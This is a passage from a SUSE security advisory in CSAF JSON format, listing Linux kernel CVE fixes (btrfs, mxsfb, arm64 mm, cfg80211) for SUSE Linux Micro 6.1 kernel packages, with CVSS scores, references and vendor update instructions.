"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2023-53863",
"url": "https://www.suse.com/security/cve/CVE-2023-53863"
},
{
"category": "external",
"summary": "SUSE Bug 1254657 for CVE-2023-53863",
"url": "https://bugzilla.suse.com/1254657"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T09:10:01Z",
"details": "moderate"
}
],
"title": "CVE-2023-53863"
},
{
"cve": "CVE-2023-53864",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-53864"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\ndrm/mxsfb: Disable overlay plane in mxsfb_plane_overlay_atomic_disable()\n\nWhen disabling overlay plane in mxsfb_plane_overlay_atomic_update(),\noverlay plane\u0027s framebuffer pointer is NULL. So, dereferencing it would\ncause a kernel Oops(NULL pointer dereferencing). Fix the issue by\ndisabling overlay plane in mxsfb_plane_overlay_atomic_disable() instead.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2023-53864",
"url": "https://www.suse.com/security/cve/CVE-2023-53864"
},
{
"category": "external",
"summary": "SUSE Bug 1254754 for CVE-2023-53864",
"url": "https://bugzilla.suse.com/1254754"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T09:10:01Z",
"details": "moderate"
}
],
"title": "CVE-2023-53864"
},
{
"cve": "CVE-2023-53865",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-53865"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nbtrfs: fix warning when putting transaction with qgroups enabled after abort\n\nIf we have a transaction abort with qgroups enabled we get a warning\ntriggered when doing the final put on the transaction, like this:\n\n [552.6789] ------------[ cut here ]------------\n [552.6815] WARNING: CPU: 4 PID: 81745 at fs/btrfs/transaction.c:144 btrfs_put_transaction+0x123/0x130 [btrfs]\n [552.6817] Modules linked in: btrfs blake2b_generic xor (...)\n [552.6819] CPU: 4 PID: 81745 Comm: btrfs-transacti Tainted: G W 6.4.0-rc6-btrfs-next-134+ #1\n [552.6819] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS rel-1.16.2-0-gea1b7a073390-prebuilt.qemu.org 04/01/2014\n [552.6819] RIP: 0010:btrfs_put_transaction+0x123/0x130 [btrfs]\n [552.6821] Code: bd a0 01 00 (...)\n [552.6821] RSP: 0018:ffffa168c0527e28 EFLAGS: 00010286\n [552.6821] RAX: ffff936042caed00 RBX: ffff93604a3eb448 RCX: 0000000000000000\n [552.6821] RDX: ffff93606421b028 RSI: ffffffff92ff0878 RDI: ffff93606421b010\n [552.6821] RBP: ffff93606421b000 R08: 0000000000000000 R09: ffffa168c0d07c20\n [552.6821] R10: 0000000000000000 R11: ffff93608dc52950 R12: ffffa168c0527e70\n [552.6821] R13: ffff93606421b000 R14: ffff93604a3eb420 R15: ffff93606421b028\n [552.6821] FS: 0000000000000000(0000) GS:ffff93675fb00000(0000) knlGS:0000000000000000\n [552.6821] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033\n [552.6821] CR2: 0000558ad262b000 CR3: 000000014feda005 CR4: 0000000000370ee0\n [552.6822] DR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000\n [552.6822] DR3: 0000000000000000 DR6: 00000000fffe0ff0 DR7: 0000000000000400\n [552.6822] Call Trace:\n [552.6822] \u003cTASK\u003e\n [552.6822] ? __warn+0x80/0x130\n [552.6822] ? btrfs_put_transaction+0x123/0x130 [btrfs]\n [552.6824] ? report_bug+0x1f4/0x200\n [552.6824] ? handle_bug+0x42/0x70\n [552.6824] ? exc_invalid_op+0x14/0x70\n [552.6824] ? asm_exc_invalid_op+0x16/0x20\n [552.6824] ? btrfs_put_transaction+0x123/0x130 [btrfs]\n [552.6826] btrfs_cleanup_transaction+0xe7/0x5e0 [btrfs]\n [552.6828] ? _raw_spin_unlock_irqrestore+0x23/0x40\n [552.6828] ? try_to_wake_up+0x94/0x5e0\n [552.6828] ? __pfx_process_timeout+0x10/0x10\n [552.6828] transaction_kthread+0x103/0x1d0 [btrfs]\n [552.6830] ? __pfx_transaction_kthread+0x10/0x10 [btrfs]\n [552.6832] kthread+0xee/0x120\n [552.6832] ? __pfx_kthread+0x10/0x10\n [552.6832] ret_from_fork+0x29/0x50\n [552.6832] \u003c/TASK\u003e\n [552.6832] ---[ end trace 0000000000000000 ]---\n\nThis corresponds to this line of code:\n\n void btrfs_put_transaction(struct btrfs_transaction *transaction)\n {\n (...)\n WARN_ON(!RB_EMPTY_ROOT(\n \u0026transaction-\u003edelayed_refs.dirty_extent_root));\n (...)\n }\n\nThe warning happens because btrfs_qgroup_destroy_extent_records(), called\nin the transaction abort path, we free all entries from the rbtree\n\"dirty_extent_root\" with rbtree_postorder_for_each_entry_safe(), but we\ndon\u0027t actually empty the rbtree - it\u0027s still pointing to nodes that were\nfreed.\n\nSo set the rbtree\u0027s root node to NULL to avoid this warning (assign\nRB_ROOT).",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2023-53865",
"url": "https://www.suse.com/security/cve/CVE-2023-53865"
},
{
"category": "external",
"summary": "SUSE Bug 1254762 for CVE-2023-53865",
"url": "https://bugzilla.suse.com/1254762"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T09:10:01Z",
"details": "moderate"
}
],
"title": "CVE-2023-53865"
},
{
"cve": "CVE-2023-53989",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-53989"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\narm64: mm: fix VA-range sanity check\n\nBoth create_mapping_noalloc() and update_mapping_prot() sanity-check\ntheir \u0027virt\u0027 parameter, but the check itself doesn\u0027t make much sense.\nThe condition used today appears to be a historical accident.\n\nThe sanity-check condition:\n\n\tif ((virt \u003e= PAGE_END) \u0026\u0026 (virt \u003c VMALLOC_START)) {\n\t\t[ ... warning here ... ]\n\t\treturn;\n\t}\n\n... can only be true for the KASAN shadow region or the module region,\nand there\u0027s no reason to exclude these specifically for creating and\nupdateing mappings.\n\nWhen arm64 support was first upstreamed in commit:\n\n c1cc1552616d0f35 (\"arm64: MMU initialisation\")\n\n... the condition was:\n\n\tif (virt \u003c VMALLOC_START) {\n\t\t[ ... warning here ... ]\n\t\treturn;\n\t}\n\nAt the time, VMALLOC_START was the lowest kernel address, and this was\nchecking whether \u0027virt\u0027 would be translated via TTBR1.\n\nSubsequently in commit:\n\n 14c127c957c1c607 (\"arm64: mm: Flip kernel VA space\")\n\n... the condition was changed to:\n\n\tif ((virt \u003e= VA_START) \u0026\u0026 (virt \u003c VMALLOC_START)) {\n\t\t[ ... warning here ... ]\n\t\treturn;\n\t}\n\nThis appear to have been a thinko. The commit moved the linear map to\nthe bottom of the kernel address space, with VMALLOC_START being at the\nhalfway point. The old condition would warn for changes to the linear\nmap below this, and at the time VA_START was the end of the linear map.\n\nSubsequently we cleaned up the naming of VA_START in commit:\n\n 77ad4ce69321abbe (\"arm64: memory: rename VA_START to PAGE_END\")\n\n... keeping the erroneous condition as:\n\n\tif ((virt \u003e= PAGE_END) \u0026\u0026 (virt \u003c VMALLOC_START)) {\n\t\t[ ... warning here ... ]\n\t\treturn;\n\t}\n\nCorrect the condition to check against the start of the TTBR1 address\nspace, which is currently PAGE_OFFSET. This simplifies the logic, and\nmore clearly matches the \"outside kernel range\" message in the warning.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2023-53989",
"url": "https://www.suse.com/security/cve/CVE-2023-53989"
},
{
"category": "external",
"summary": "SUSE Bug 1256302 for CVE-2023-53989",
"url": "https://bugzilla.suse.com/1256302"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T09:10:01Z",
"details": "moderate"
}
],
"title": "CVE-2023-53989"
},
{
"cve": "CVE-2023-53992",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-53992"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nwifi: cfg80211: ocb: don\u0027t leave if not joined\n\nIf there\u0027s no OCB state, don\u0027t ask the driver/mac80211 to\nleave, since that\u0027s just confusing. Since set/clear the\nchandef state, that\u0027s a simple check.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2023-53992",
"url": "https://www.suse.com/security/cve/CVE-2023-53992"
},
{
"category": "external",
"summary": "SUSE Bug 1256058 for CVE-2023-53992",
"url": "https://bugzilla.suse.com/1256058"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
